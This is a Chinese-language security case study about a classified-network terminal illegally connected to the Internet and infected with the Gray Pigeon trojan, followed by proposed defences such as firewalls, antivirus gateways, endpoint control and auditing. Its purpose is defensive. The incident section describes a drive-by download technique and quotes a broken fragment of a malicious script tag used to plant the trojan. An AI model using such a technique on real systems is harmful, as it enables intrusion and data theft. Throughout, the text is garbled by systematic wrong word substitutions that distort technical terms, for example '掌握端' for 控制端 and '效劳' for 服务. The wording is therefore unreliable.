非法外联后木马引起的问题和解决办法.docx

非法外联后木马引起的泄密和解决方法1 安全大事描述某单位的网络包括内部网涉密网、外部网公开网站等两个局部。 出于安全的考虑内部网、外网进展了物理隔离。两个网络的数据不能相互通信。而涉密网也与因特网隔离，保证了涉密数据不外泄。然而在日常工作中，涉密网中的的某个人员想在因特网上进展数据查询，考虑到去外网计算机中查询不太便利，该职员就打算在涉密网终端上通过连接外网网线的方式进展因特网访问。在该职员连接到因特网进展网页扫瞄时，去访问了某个经济论坛，正好该论坛被黑客进展了攻击，网页上被挂了利用“网页木马生成器”打包进去的灰鸽子变种病毒。黑客利用“自动下载程序技术”，让该职员不觉察的状况下被种植了木马。 该 技 术 在 网 页 中 利 用 <SCRIPT LANGUAGE=“icyfoxlovelace“ src=“ :/* 代码中“src”的属性为程序的网络地址，本例中“ :/ * 黑客放置在自己 Web 效劳器上的灰鸽子效劳端安装程序，这段代码能让网页下载该程序到扫瞄它的电脑上。把这段代码插入到网页源代码的</BODY></BODY> 之间。而在该人员访问该网页时，用他的没打补丁的 IE6 翻开后，该涉密终端IE 的临时名目<Temporary Internet Files>文件夹中就会有一个“1.exe”文件，这也就是说，该网页已自动下载了黑客放置在 Web 效劳器上的灰鸽子木马。灰鸽子是反弹型木马，该木马能绕过大多数防火墙的拦截，中马后，效劳端即被控端能主动连接掌握端客户端，也就是说，一旦被控端连接到 Internet， 在掌握端那里，被控端就会“自动上线”。 在本大事中涉密网的该终端中灰鸽子病毒后的电脑会被远程攻击者完全掌握，远程黑客可以轻易的复制、删除、上传、下载保存在被控电脑上的文件，机密文件在该涉密网职员毫不知情的状况下被窃取。 最终造成了重大泄密大事类似大事近期发生比较多，据报道在上年的一起网络间谍案调查中，有关部门从某部门的内部电脑网络发行了非法外联的状况，并在很多内部电脑中检测出了不少特制的木马程序，检测结果说明，全部入侵木马的连接都指向境外的特定间谍机构。专业部门进展检测时，测出的木马很多还正在下载、外传资料，专业人员当即实行措施，制止了进一步的危害。2 安全背景分析现在，一些安全性较高的内部网络军事部门的网络常常承受和外部网络如 Internet实施物理隔离的方法来确保其网络的安全性。物理隔离确保了外部网络和内部网络之间不存在任何可能的物理链路，因此这种安全手段应付外部攻击是格外高效的。但是，假设这样的网络中有某个主机通过拨号或其他形式私自接入外部网络，这种物理隔离就会被破坏。黑客极可能通过该主机进入内部网络，进而通过嗅探、破解密码等方式对内部的关键信息或敏感数据进展收集， 或以该主机为“跳板”对内部网络的其他主机进展攻击。始终以来，安全防范理念局限在常规的网关级别 防火墙等、网络边界 漏洞扫描、安全审计、防病毒、IDS 等方面的防范， 重要的安全设施大致集中于机房、网络入口处，在这些设备的严密监控下，来自网络外部的安全威逼大大减小。但是来自网络内部的安全威逼却是多数网络治理人员真正需要面对的问题。在目前网络治理工作中，对网络的正常运转威逼最大的是客户端安全治理。内网的客户端构成了内网 90以上的组成，当之无愧地成为内网安全的重中之重。实践证明，单纯的物理隔离手段还不能够完全将内部网络与外部网络隔离开来，对内网客户端机器使用、治理还存在众多安全隐患，特别是非法外联的隐患。“非法外联”使得因人为有意或无意的疏忽在内网与外网间开出的连接通道成为可能，外部的黑客攻击或者病毒就能够绕过原本连接在内、外网之间的防护屏障，顺当侵入非法外联的计算机，盗窃内网的敏感信息和机密数据，造成泄密大事。在内部终端非法外联到外部网络后常遇到各种安全威逼，例如病毒、木马、非授权访问、数据窃听、暴力破解等。其中木马是目前威逼比较广、威逼后果比较严峻、常导致涉密信息泄漏。木马具有高度的隐蔽性，入侵后用户毫无觉察，这也给黑客盗取用户私人信息供给了“有利”条件。黑客往往通过邮件、IM 工具以及网页挂马等方式将木马植入用户电脑，进而获得用户电脑的掌握权，接下来就可以对用户电脑内的私人信息为所欲为保密单位的内部工作网是不与互联网连接的，但有关部门做安全检测时仍旧从中觉察了境外情报部门的木马，这是涉密网络终端不遵守保密治理方法导致的，例如非法接入到外部网络，移动介质和非移动介质混用等状况。境外间谍部门特地设计了各种各样的木马，并且搜集了我国大量保密单位工作人员的个人网址或在很多站点网页挂马，只要这些人当中有非法连接到互联网，摆渡木马有可能静静植入内部网络终端，摆渡木马马上就感染内网，把保密资料传输到攻击者指定地方，从而实现保密信息的窃取。从上面安全大事、安全背景分析，可看出在保密内网的安全建设中，非法外联和木马攻击是两大突出问题，需要在安全措施上供给完成全面的应对手段。3 安全需求分析上述泄密大事是经受了内网非法外联、木马通过外部网络进入内部网络、木马感染主机、泄密、泄密大事的觉察等阶段。要防止此类大事的根本思想是要解决木马传播、主动预防和木马检测与去除等系列问题，形成一个纵深的防范体系。这涉及以下几个方面的工作需求：1、对网络边界的防护；2、对主机安全的防护； 3、有效的安全治理。具体分析如下：对边界防护的需求木马都是由外部网络传入内部网络的，必需在边界处进展有效的掌握，防止恶意行为的发生，实现拒敌在国门之外。针对边界防护，需要考虑加强防护的方面有：内网和外网间的边界防护实现保密内网与外网的物理隔离，从而保证将攻击者、攻击途径彻底隔断。在需要内网、外网有必要的数据交换时，必需部署安全隔离和信息交换系统，从而实现单向信息交换，只允许外网数据传输到内网，制止内网信息流出到外网。同时实行以下措施：对核心内部效劳器的边界防护内网中常包括核心效劳器群、内网终端两大局部，核心效劳器保存着大局部保密信息，为防止通过网终端非法外联来非法猎取核心效劳器上的保密数据的行为，要对核心效劳器与内网终端间的进展边界防护。即设置核心效劳器的边界安全网关，它能够阻挡终端的越权访问，并检查是否含有木马，然后进展去除。防止担忧全的在线非法外联内网与外网的连接点必需做到可管、可控，必需有效监控内网是否存在违规拨号行为、无线上网行为、搭线上网行为，避开内用户实行私自拨号等方式的访问互联网而造成的安全风险。防止离线非法外联或担忧全的接入行为主要是需要防范各种计算机的随便接入行为，对于非授权的或不符合安全条件的设备比方没有安装防病毒软件，操作系统没有准时升级补丁，没有获得合法安排的 IP 地址或离线外联过必需制止进入。对主机安全的需求内网终端非法外联后木马入侵的目的都是最终的主机。主机的防护必需全面、准时，否则将导致直接的安全大事。主要有以下几个方面：木马病毒的查杀和检测力量的需求每台计算机要具备查杀力量，同时由于内部网络中的计算机数量很多，要确保网络中全部计算机安装防木马软件，并实施实施统一的防木马策略。系统自身安全防护的需求木马在主机中的隐蔽、执行和攻击最终都是表达在操作系统层面。要确保操作系统准时升级，防止漏洞被木马和病毒利用。在此根底上，要实时对计算机进程、访问端口进展监控；同时要有注册表防护手段，保障木马不能修改系统信息，从而使木马不能隐蔽与自动运行。移动存储介质掌握的需求移动存储介质木马传播的一个重要渠道。主机系统要在移动介质接入系统时马上截获该大事以阻断移动介质病毒的自动运行与传播。安全审计的需求系统的日志记录了系统的工作状况，和工作人员的操作行为。它可推断是否存在违规行为，利于行政的威慑与治理；同时由于木马要与互联网上的掌握端连接，通过审计可以实时觉察木马的行踪，还有通过对整个内部网络的审计系统可以暴露一些深层次的安全威逼。对安全治理的需求为防止泄密大事的发生，除了加强安全技术的管控外，也要加强安全治理。定期查看关键计算机设备的状态，觉察与定位计算机中已经感染的木马，防止木马的泄密等破坏行为发生；另外要建立应急响应机制，在泄密大事发生后定位与隔离涉及的主机，是安全大事能够追查到责任人。同时加强对相关人员的安全教育。4 具体措施针对上述的安全需求，对应的安全措施如下，这些措施形成了一个完整的体系：边界防护的措施防火墙技术防火墙是实现内网终端与内网核心效劳器隔离的根本手段。防火墙通常位于不同网络或网络安全域之间信息的唯一连接处，依据组织的业务特点、治理制度所制定的安全策略，运用包过滤、代理网关、NAT 转换、IP+MAC 地址绑定等技术，实现对出入核心效劳器网络的信息流进展全面的掌握允许通过、拒绝通过、过程监测，掌握类别包括 IP 地址、TCP/UDP 端口、协议、效劳、连接状态等网络信息的各个方面，从而实现对不良网站的封堵。但是传统单一的防火墙无法有效对抗更隐蔽的攻击行为，比方哄骗攻击、木马攻击等，因此有必要在这些边界实行防护力量更强的技术。防病毒网关技术随着网络的飞速进展，单机版的防病毒软件面临着集中治理、智能更等多方面的问题，已经不能满足简单应用环境，无法对木马、蠕虫、邮件性病毒进展全网整体的防护，所以构建整体病毒防护体系已成为必定。完整的防毒体系包括： 网关级防病毒部署在网络入口处，对木马、病毒、蠕虫和垃圾邮件进展有效过滤；效劳器防病毒效劳器为资源共享和信息交换供给了便利条件，但同时也给病毒的传播和集中以可乘之机；桌面级防病毒在客户端安装，将病毒在本地去除而不至于集中到其他主机或效劳器；病毒治理中心实现防病毒软件的集中治理和分发、病毒库分发、病毒大事集中审计等。在不与外网连接的内部保密网中，可将防病毒网关部署在核心效劳器区和终端区之间，通过网关把病毒拒绝在核心效劳器区网络之外是最好的解决方法。可以防止将网络内部受到感染的病毒文件传到重点保护的效劳器当中，使得各个网络能够相互独立。在与外网连接的内部保密网中，可将防病毒网关部署在外网和内网连接边界中之间，通过网关把病毒拒绝在内部保密网络之外。要求网关防毒产品部署简便； 能够为经过方病毒网关的数据流量检测并去除病毒。终端防护系统为了防止担忧全的在线非法外联和防止离线非法外联或担忧全的接入行为， 必需把终端防护系统与其它网关防护技术结合。通过终端防护系统的统一策略配置的主机防火墙和主机 IDS，实现对桌面系统的网络安全检测和防护，当 IDS 检测到报警后能够与主机防火墙进展联动，自动阻断外部攻击行为。通过终端防护系统可对桌面系统的远程拨号行为、无线上网行为、搭线上网行为进展掌握，觉察存在违规外联的主机，给出报警，通过防火墙切断该主机与网络的连接，避开由于该设备而导致内网遭到更大的破坏。通过终端防护系统的安全状态检测策略觉察进入内网的终端设备，对于不符合安全条件的设备则不允许接入内网。网闸技术对于安全性要求很高，但又有内部网络和外网数据交换的状况下，必需实行网闸技术实现内网和外网的单向安全隔离和数据交换。主机安全的防护桌面木马与病毒查杀技术在一个整体病毒防护方案中，桌面级防病毒是重要的支点。对木马的防范， 除了通常的桌面防病毒产品外还有一些特地的木马查杀产品，象瑞星卡卡、360 安全卫士等。终端防护技术承受终端治理系统，这是对局域网内部的网络安全行为进展全面监管，检测并保障桌面系统的安全的产品，能有效保障桌面系统及机密数据的安全。安全治理安全审计系统承受安全审计系统软件。安全治理平台系统引入安全治理平台系统，这是单位安全治理团队格外必要的技术支撑系统。信息安全治理平台能实时对网络设备、效劳器、安全设备、数据库、中间件、应用系统的安全状况进展统一监控、采集安全大事和日志信息、进展整合和关联分析、评估安全风险、审计用户行为、产生安全事故和告警、生成安全报告并准时进展应急响应，确保相关系统的业务持续运行，帮助治理人员排解安全隐患和安全故障，同时为相关部门的信息安全审计和考核供给技术手段和依据，实现全网的安全集中监控、审计和应急响应，全面提升保密内网的信息安全保障力量。定期巡检效劳定期巡检效劳。定期查看与觉察系统存在的安全漏洞，觉察关键计算机设备的状态，觉察与定位计算机中已经感染的木马，防止木马的泄密等破坏行为发生；强化信息安全与保密的教育